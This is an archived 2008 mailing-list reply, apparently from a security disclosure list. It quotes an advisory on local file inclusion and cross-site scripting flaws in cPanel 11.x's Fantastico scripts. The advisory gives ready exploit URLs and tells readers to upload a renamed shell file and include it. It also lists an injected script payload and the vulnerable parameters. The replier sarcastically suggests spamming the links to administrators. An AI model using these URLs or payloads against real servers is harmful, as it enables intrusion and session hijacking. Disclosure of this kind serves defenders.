Re: Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani
- From: Jan van Niekerk <jvnkrk@xxxxxxxxx>
- Date: Thu, 20 Nov 2008 15:07:55 +0200
On Friday 31 October 2008 15:03:55 irancrash@xxxxxxxxx wrote:
----------------------------------------------------------------Happy birthday to you.
Script : Cpanel 11.x
Type : Local File Inclusion & Cross Site Scripting
Risk : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
**** I am 17 Years Old ****
My Official Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Local File Inclusion Vulnerability :
Note : Rename your shell to config.php and upload with your ftp account in
./ directory .... , now login in cpanel and enter vulnerable address in url
....
https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra
de.php?action=GoAhead&scriptpath_show=/home/[youruser]/
https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgra
de.php?action=GoAhead&scriptpath_show=/home/[youruser]/
https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrad
e.php?action=GoAhead&scriptpath_show=/home/[youruser]/
According to netenberg.com there is no prospect of privilege escalation here.
On their forum http://www.netenberg.com/forum/index.php?topic=6832 they say:
I do not see any reason as to why anyone would do this as they can already
do the same via cPanel/SSH (this exploit will only work on the cPanel
account of the person who wishes to use it; he/she cannot affect any other
account on the server).
I guess they feel similarly about the cross-site scripting. You can start
embedding those links in spam to your administrator now.
----------------------------------------------------------------
Cross site scripting :
File Address :
frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%
20to%201.7.4
Set Action as Upgrade%20to%201.7.4
Vulnerable Variables :
$localapp
$updatedir
$scriptpath_show
$domain_show
$thispage
$thisapp
$currentversion
For Example :
https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra
de.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%
3C/script%3E
- Prev by Date: Re: Re: Re: Re: Re: Opera 9.6x file:// overflow
- Next by Date: boastMachine v3.1 Remote Sql Injection
- Previous by thread: [ MDVSA-2008:220-1 ] kernel
- Next by thread: Re: Re: Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani
- Index(es):
Relevant Pages
|
